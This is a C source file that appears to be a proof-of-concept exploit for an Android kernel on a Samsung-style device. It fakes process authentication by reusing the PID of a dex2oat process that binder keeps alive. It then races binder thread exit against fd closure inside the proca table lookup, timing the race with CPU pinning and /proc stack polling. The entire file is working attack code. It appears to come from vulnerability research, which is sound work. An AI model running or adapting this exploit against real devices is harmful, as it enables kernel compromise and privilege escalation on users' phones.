#define _GNU_SOURCE
#include <string.h>
#include <time.h>
#include <stdio.h>
#include <sched.h>
#include <err.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdbool.h>
#include <assert.h>
#include <stdint.h>
#include <errno.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/resource.h>
#include <sys/ioctl.h>
#include <sys/eventfd.h>

#define SYSCHK(x) ({                      \
  typeof(x) __res = (x);                  \
  if (__res == -1) err(1, "SYSCHK: " #x); \
  __res;                                  \
})

// from kernel sources
#define GOLDEN_RATIO_32 0x61C88647
#define PROCA_TASKS_TABLE_SHIFT 10
static inline unsigned int proca_hash_32(unsigned int val) {
  return val * GOLDEN_RATIO_32;
}
static unsigned long calculate_pid_hash(pid_t pid) {
  return proca_hash_32(pid) >> (32 - PROCA_TASKS_TABLE_SHIFT);
}
struct binder_node_debug_info {
  __u64 ptr;
  __u64 cookie;
  __u32 has_strong_ref;
  __u32 has_weak_ref;
};
#define BINDER_GET_NODE_DEBUG_INFO  _IOWR('b', 11, struct binder_node_debug_info)
#define BINDER_THREAD_EXIT    _IOW('b', 8, __s32)
#ifndef EFD_SEMAPHORE // apparently android's NDK is missing this?
#define EFD_SEMAPHORE (1 << 0)
#endif


#define PID_MAX 32768 // correct on a50, ymmv on other devices
#define NUM_PROCESS_BINDER_FDS 10
// Bump this to 200 if you want to see scheduling delays on the order of
// milliseconds. Going much further would require extra engineering to
// circumvent file descriptor table size limits.
#define NUM_THREAD_BINDER_FDS 20
#define NUM_BINDER_FDS (NUM_PROCESS_BINDER_FDS + NUM_THREAD_BINDER_FDS)
#define NR_COLLECT_THREADS 8
#define SPAM_THREADS 13000

// Used for first side of the race (BINDER_THREAD_EXIT) and the task that
// interrupts it.
#define MAIN_CPU 0
// Dedicated CPU for a busyloop that sends IPIs to the MAIN_CPU in small
// intervals.
#define CLOCK_CPU 1
// Runs the second side of the race (close binder fd) when signalled by
// MAIN_CPU.
#define SECOND_SIDE_CPU 2

// shared memory between all our processes
static struct {
  // The first NUM_PROCESS_BINDER_FDS of these are /dev/binder opened by the
  // process they should hold a reference on. When they are closed, they will
  // drop that reference from global work context (so these can't race with each
  // other).
  // The other NUM_THREAD_BINDER_FDS hold a reference on the target process
  // through a binder_thread. These references can be released synchronously via
  // BINDER_THREAD_EXIT from a task with the same PID.
  int binder_fds[NUM_BINDER_FDS];
  int binder_fds_used;
  // PIDs of a bunch of threads we create to reduce the time for repeatedly
  // cycling through the PID space.
  int spam_threads[SPAM_THREADS];
  // Number of tasks to which we're holding references through binder where the
  // PID hashes to target_pid_hash (and therefore hash bucket collisions occur).
  int garbage_fds_used;
} *S;

// The PID for which we're collecting binder FDs.
static pid_t target_pid = -1;
// == calculate_pid_hash(target_pid)
static int target_pid_hash = -1;
// First the pid of the pre-parent (preparent_fn()), then the PID of the
// parent (parent_fn()).
static int parent_pid = -1;

// bionic's getpid() uses some stupid cache that doesn't interact properly with
// clone(). sooo...
#undef getpid
#define getpid() ((int)syscall(__NR_getpid))

// ensure that when the main process of the exploit is killed via something like
// ^C, the entire process tree dies relatively quickly
static void set_pdeathsig(void) {
  SYSCHK(prctl(PR_SET_PDEATHSIG, SIGKILL));
  if (getppid() == 1) errx(1, "parent went away immediately");
}

// get current time in microseconds
static uint64_t getmicros(void) {
  struct timeval tv;
  SYSCHK(gettimeofday(&tv, NULL));
  return ((uint64_t)tv.tv_sec) * 1000000 + tv.tv_usec;
}

// tell the scheduler to pin a task to a specific CPU core
static void pin_task_to(int pid, int cpu) {
  cpu_set_t cset;
  CPU_ZERO(&cset);
  CPU_SET(cpu, &cset);
  SYSCHK(sched_setaffinity(pid, sizeof(cpu_set_t), &cset));
}
static void pin_to(int cpu) { pin_task_to(0, cpu); }

static int dummy_child_fn() {
  _exit(0);
}

static int first_child_fn() {
  S->binder_fds[0] = SYSCHK(open("/dev/binder", O_RDWR));
  S->binder_fds_used = 1;
  return 0;
}

static int child_fn() {
  pid_t my_pid = getpid();
  if (calculate_pid_hash(my_pid) != target_pid_hash)
    _exit(0);

  if (my_pid == target_pid) {
    /* atomically reserve a slot in S->binder_fds, then put the fd in there */
    int binder_idx = __sync_fetch_and_add(&S->binder_fds_used, 1);
    if (binder_idx < NUM_PROCESS_BINDER_FDS) {
      int binder_fd = SYSCHK(open("/dev/binder", O_RDWR));
      S->binder_fds[binder_idx] = binder_fd;
    } else if (binder_idx < NUM_BINDER_FDS) {
      if (ioctl(S->binder_fds[binder_idx], BINDER_GET_NODE_DEBUG_INFO, 0xbad) != -1 || errno != EFAULT)
        err(1, "garbage fd dummy ioctl");
    }

    printf("have %d/%d fds, plus %d hash bucket spam fds...\n", binder_idx, NUM_BINDER_FDS, *(volatile int *)&S->garbage_fds_used);
  } else {
    SYSCHK(open("/dev/binder", O_RDWR));
    __sync_fetch_and_add(&S->garbage_fds_used, 1);
  }

  return 0;
}

static int pid_distance(pid_t pid, pid_t target) {
  if (pid <= target)
    return target - pid;
  else
    return target + PID_MAX - pid;
}

#define STACK_PARENT 0
#define STACK_DELEGATED_PARENT 1
#define STACK_CHILD 2
#define STACK_SECOND_SIDE 3
static pid_t do_clone(int (*fn)(void), int stack_idx, bool shared_vm) {
  static char stacks[4][8*1024*1024] __attribute__((aligned(16)));
  int clone_flags = CLONE_FILES|CLONE_FS|CLONE_IO|CLONE_SYSVSEM|
                    SIGCHLD|
                    (shared_vm ? CLONE_VM|CLONE_SIGHAND : 0);
  pid_t pid = SYSCHK(clone((int (*)(void *))fn, stacks[stack_idx] + sizeof(stacks[stack_idx]), clone_flags, NULL));
  return pid;
}

/* skip to the next currently-unused PID */
static int pid_increment(int pid) {
  do {
    pid++;
    if (pid >= PID_MAX)
      pid = pid - PID_MAX + 1;
  } while (syscall(__NR_tkill, pid, 0) != -1 || errno != ESRCH);
  return pid;
}
static int delegated_parent_fn() {
  set_pdeathsig();
  int status;

  pid_t last_child = -1;
  while (*(volatile int *)&S->binder_fds_used < NUM_BINDER_FDS) {
    // Figure out whether the child we're going to create might allocate a PID
    // for which we want to allocate a binder FD. If not, we can use CLONE_VM to
    // make the clone much cheaper.
    bool near_target = false;
    if (last_child == -1) {
      // empty
    } else if (pid_distance(last_child, target_pid) < 50) {
      near_target = true;
    } else {
      int predicted_pid = last_child;
      for (int i=0; i<8; i++) {
        predicted_pid = pid_increment(predicted_pid);
        if (calculate_pid_hash(predicted_pid) == target_pid_hash) {
          near_target = true;
          break;
        }
      }
    }

    pid_t child;
    if (near_target) {
      child = do_clone(child_fn, STACK_CHILD, false);
    } else {
      child = do_clone(dummy_child_fn, STACK_CHILD, true);
      if (child == target_pid)
        puts("whoops, shot past");
    }
    if (waitpid(child, &status, 0) != child) err(1, "wait");
    last_child = child;
  }
  return 0;
}

static int spam_fn(void *arg) {
  pause();
  /* exit on SIGUSR1, we have an empty signal handler for that */
  return 0;
}

static volatile int releasing_state = 0;

static int release_thread_fds_(void) {
  if (getpid() != target_pid) _exit(0);
  printf("got pid reuse\n");

  set_pdeathsig();
  // pin both us and the releasing thread onto a single CPU
  pin_to(MAIN_CPU);
  struct sched_param param = { .sched_priority = 0 };
  SYSCHK(sched_setscheduler(0, SCHED_IDLE, &param));

  /* without this last_kmsg will be flooded with thread stacks and the
   * interesting stuff is gone */
  for (int i=0; i<SPAM_THREADS; i++)
    syscall(__NR_tkill, S->spam_threads[i], SIGUSR1);
  printf("waiting 5s before releasing binder threads...\n");
  sleep(5);

  uint64_t start_time = getmicros();
  releasing_state = 1;
  for (int i=NUM_PROCESS_BINDER_FDS; i<NUM_BINDER_FDS; i++) {
    //uint64_t pre_ioctl_time = getmicros();
    SYSCHK(ioctl(S->binder_fds[i], BINDER_THREAD_EXIT, 0));
    //uint64_t post_ioctl_time = getmicros();
    //printf("releasing one binder thread took %llu us\n", post_ioctl_time - pre_ioctl_time);
  }
  releasing_state = 2;
  uint64_t end_time = getmicros();
  printf("releasing %d binder threads took %lu us\n", NUM_BINDER_FDS-NUM_PROCESS_BINDER_FDS, (unsigned long)(end_time - start_time));
  return 0;
}

static int clock_ring_fd = -1;
static int clock_rearm_fd = -1;
static int second_race_side_trigger = -1;

static void efd_wake(int fd) { uint64_t val = 1; if (write(fd, &val, sizeof(val)) != sizeof(val)) err(1, "efd_wake"); }
static void efd_wait(int fd) {
  uint64_t val;
  while (1) {
    if (read(fd, &val, sizeof(val)) != sizeof(val)) {
      if (errno == EAGAIN || errno == EINTR) {
        continue;
      } else {
        err(1, "efd_wait");
      }
    }
    break;
  }
}

static int clock_fn() {
  pin_to(CLOCK_CPU);
  set_pdeathsig();

  while (releasing_state == 0) /*empty*/;
  uint64_t last_wake = 0;
  while (releasing_state == 1) {
    uint64_t cur_time = getmicros();
    if (cur_time - last_wake < 2)
      continue;
    efd_wake(clock_ring_fd);
    efd_wait(clock_rearm_fd);
    last_wake = getmicros();
  }
  efd_wake(clock_ring_fd);
  return 0;
}

static volatile int second_race_side_done = 0;
static int second_race_side_fn() {
  pin_to(SECOND_SIDE_CPU);
  set_pdeathsig();

  int idx = 0;
  while (1) {
    efd_wait(second_race_side_trigger);
    if (idx < NUM_PROCESS_BINDER_FDS) {
      close(S->binder_fds[idx]);
      idx++;
      second_race_side_done = 1;
      puts("second race side triggered and done");
    } else {
      second_race_side_done = 1;
      puts("second race side out of fds");
    }
  }
}

static void release_thread_fds(void) {
  int status;
  while (1) {
    pid_t child = do_clone(release_thread_fds_, STACK_DELEGATED_PARENT, true);
    if (child == target_pid)
      break;
    if (waitpid(child, &status, 0) != child) err(1, "waitpid");
  }

  clock_ring_fd = SYSCHK(eventfd(0, EFD_SEMAPHORE));
  clock_rearm_fd = SYSCHK(eventfd(0, EFD_SEMAPHORE|EFD_NONBLOCK));
  second_race_side_trigger = SYSCHK(eventfd(0, EFD_SEMAPHORE|EFD_NONBLOCK));
  do_clone(clock_fn, STACK_CHILD, true);
  do_clone(second_race_side_fn, STACK_SECOND_SIDE, true);

  // pin both us and the releasing thread onto a single CPU
  pin_to(MAIN_CPU);

  char stack_path[100];
  sprintf(stack_path, "/proc/%d/stack", target_pid);
  int stack_fd = SYSCHK(open(stack_path, O_RDONLY));
  char stack_buf[1000];

  uint64_t cur_time, last_time;
  int read_iterations = 0;
  while (releasing_state < 2) {
    read_iterations++;
    efd_wait(clock_ring_fd);
    cur_time = getmicros();
    int read_res = pread(stack_fd, stack_buf, sizeof(stack_buf)-1, 0);
    if (read_res == -1) {
      if (errno == ESRCH) {
        puts("got ESRCH in polling loop");
        break;
      }
      err(1, "pread stack");
    }
    stack_buf[read_res] = '\0';
    char *p = strchr(stack_buf, '\n');
    if (p) {
      p = strchr(p, ' ');
      if (p && strncmp(p, " el1_preempt+", 13) == 0) {
        p = strchr(p, '\n');
        if (p) {
          p = strchr(p, ' ');
        }
      }
      char *line_end = strchr(p, '\n');
      if (line_end)
        *line_end = '\0';
    }

    if (p) {
#ifdef DEBUG_PREEMPTION
      printf("preempted in \"%s\" after delay %lu us\n", p+1, (unsigned long)(cur_time-last_time));
#endif
      if (strcmp(p+1, "proca_table_get_by_pid+0x84/0x98") == 0) {
#ifndef DEBUG_PREEMPTION
        efd_wake(second_race_side_trigger);
        while (second_race_side_done == 0) /* spin */;
        second_race_side_done = 0;
#endif
        puts("!!! PREEMPTED DURING FIRST SPINLOCKED REGION");
      }
    } else {
      printf("stack_buf empty???\n");
    }
    last_time = cur_time;
    efd_wake(clock_rearm_fd);
  }
  printf("read_iterations: %d\n", read_iterations);

  if (waitpid(target_pid, &status, 0) != target_pid) err(1, "waitpid");
}

static void empty_handler(int sig) {}

static int parent_fn() {
  int status;

  if (getpid() != parent_pid)
    _exit(42);

  set_pdeathsig();
  printf("reallocated pid for parent\n");

  // This thread is (falsely) authenticated.
  // Now fork off children targeting a different PID, copying authentication
  // info into each child.
  // WARNING: For forks that should copy authentication info, we can't use
  // CLONE_VM, that inhibits the copying (see task_integrity_apply()).

  // first, launch a single child to figure out what PID we want to target...
  target_pid = do_clone(first_child_fn, STACK_CHILD, false);
  if (waitpid(target_pid, &status, 0) != target_pid) err(1, "waitpid");
  target_pid_hash = calculate_pid_hash(target_pid);
  printf("target_pid = %d, target_pid_hash = %d\n", target_pid, target_pid_hash);

  // spam threads to consume at least some of the PID space; we can consume
  // about 40% of the entire PID space, so this isn't entirely meaningless.
  signal(SIGUSR1, empty_handler); // interrupt pause() on incoming signal
  for (int i=0; i<SPAM_THREADS; i++) {
    static char tiny_stacks[SPAM_THREADS][0x8000] __attribute__((aligned(16)));
    int tflags = CLONE_FILES|CLONE_FS|CLONE_IO|CLONE_SIGHAND|CLONE_SYSVSEM|
                 CLONE_THREAD|CLONE_VM;
    void *tstack = tiny_stacks[i] + sizeof(tiny_stacks[i]);
    S->spam_threads[i] = SYSCHK(clone(spam_fn, tstack, tflags, NULL));
  }
  printf("spam threads allocated\n");

  // Delegate the creation of children to several workers so that stuff goes
  // faster.
  for (int i=0; i<NR_COLLECT_THREADS; i++)
    do_clone(delegated_parent_fn, STACK_DELEGATED_PARENT, false);
  for (int i=0; i<NR_COLLECT_THREADS; i++)
    SYSCHK(wait(&status));
  puts("fds set up.");

  // We're done collecting binder fds, now use them to trigger the bug.
  release_thread_fds();
  exit(0);
}

// The pre-parent process executes dex2oat (gaining authentication), then dies,
// but its task_struct doesn't go away because binder holds a reference to it,
// so the authentication of the PID is preserved and can be reused by the new
// parent (running parent_fn()) with the same PID.
static int preparent_fn() {
  set_pdeathsig();
  SYSCHK(open("/dev/binder", O_RDWR|O_CLOEXEC));
  // Intentionally leak the fd into the main process to keep the preparent's
  // authentication alive for the parent.

  execl("/system/bin/dex2oat", "dex2oat", "--blah", NULL);
  err(1, "execl failed");
}

int main(void) {
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);
  printf("start\n");

  S = mmap(NULL, (sizeof(*S)+0xfffUL)&~0xfffUL, PROT_READ|PROT_WRITE,
           MAP_SHARED|MAP_ANONYMOUS, -1, 0);
  if (S == MAP_FAILED) err(1, "mmap shared");

  for (int i=NUM_PROCESS_BINDER_FDS; i<NUM_BINDER_FDS; i++)
    S->binder_fds[i] = SYSCHK(open("/dev/binder", O_RDWR));

  // launch the pre-parent to make a PID authenticated
  parent_pid = do_clone(preparent_fn, STACK_PARENT, true);
  int status;
  if (waitpid(parent_pid, &status, 0) != parent_pid) err(1, "waitpid");
  printf("pre-parent done, reallocating pid for parent...\n");

  // reuse pre-parent's PID for parent (which will then be falsely
  // authenticated)
  pid_t new_parent;
  siginfo_t new_parent_death;
  do {
    new_parent = do_clone(parent_fn, STACK_PARENT, true);
    SYSCHK(waitid(P_PID, new_parent, &new_parent_death, WEXITED));
  } while (new_parent != parent_pid);
  printf("parent has exited: ");
  switch (new_parent_death.si_code) {
  case CLD_EXITED:
    printf("exited (code=%d)\n", new_parent_death.si_status);
    break;
  case CLD_KILLED:
    printf("killed (signal %d)\n", new_parent_death.si_status);
    break;
  default:
    printf("???\n");
    break;
  }
  return 0;
}
